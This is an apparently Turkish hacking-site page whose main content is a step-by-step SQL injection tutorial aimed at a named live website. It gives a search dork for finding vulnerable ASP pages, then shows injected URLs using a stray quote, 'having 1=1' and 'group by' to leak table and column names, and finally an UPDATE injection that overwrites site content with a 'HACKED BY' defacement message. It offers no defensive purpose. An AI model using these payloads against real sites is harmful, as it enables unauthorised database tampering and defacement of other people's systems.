| MENÜ |
|
|
|
Web Server Güvenliği
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
MSN Hack
|
|
|
|
|
|
Eğlence
|
|
|
|
|
|
MSN
|
|
|
|
|
|
|
|
|
|
Mp3
|
|
|
|
Program İndirme Bölümü
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Diğer
|
|
|
|
|
|
|
| |
S A arkadaşlar Sizlere Sql İnjection Dan Bahsedeceğim Bir hafta önce yeni çıkmış açık üzrinde tabi
Google Arama Kodumuz=inurlroduct_detail.asp?catalogid=8
Tabi Burdaki 8 numarasını değiştirebilirsiniz çok fazla seçenek varama 8 ve 2 numarasında daha çok site çıkmaktadır ewet başlayalım
Örneklerle;
1.aşama=http://www.aguzzo.com.br/news.asp?id=11 önümüze geldi ve sonra
http://www.aguzzo.com.br/news.asp?id=11’a hatayı alıyoruz
2.aşama=http://www.aguzzo.com.br/news.asp?id=11 having 1=1
Ve Önümüze Tablo İsmi geliyor ’TBL_NOTICIAS.not_int_codigo’
Bunu Şöle Yapıyoruz
http://www.aguzzo.com.br/news.asp?id=11 group by TBL_NOTICIAS.not_int_codigo
Ekledik Ve Önümüze Hem Tablo İsmi Hemde Kolon İsmi geliyor
’TBL_NOTICIAS.not_str_titulo’
3.aşama=ve sitenin sonuna son olarak şunu ekliyoruz
+update+tabloismi+set+kolonismi=’ İstediğnizi yazın’
http://www.aguzzo.com.br/news.asp?id...ot_str_titulo=' HACKED BY THE ESREF'
Ve Bukdaar Kolay Gelsin hepinize
|
|
|
|
|
|
| |
Bugün 38 ziyaretçi (65 klik) kişi burdaydı! |
|
|
|
|
|
|
|
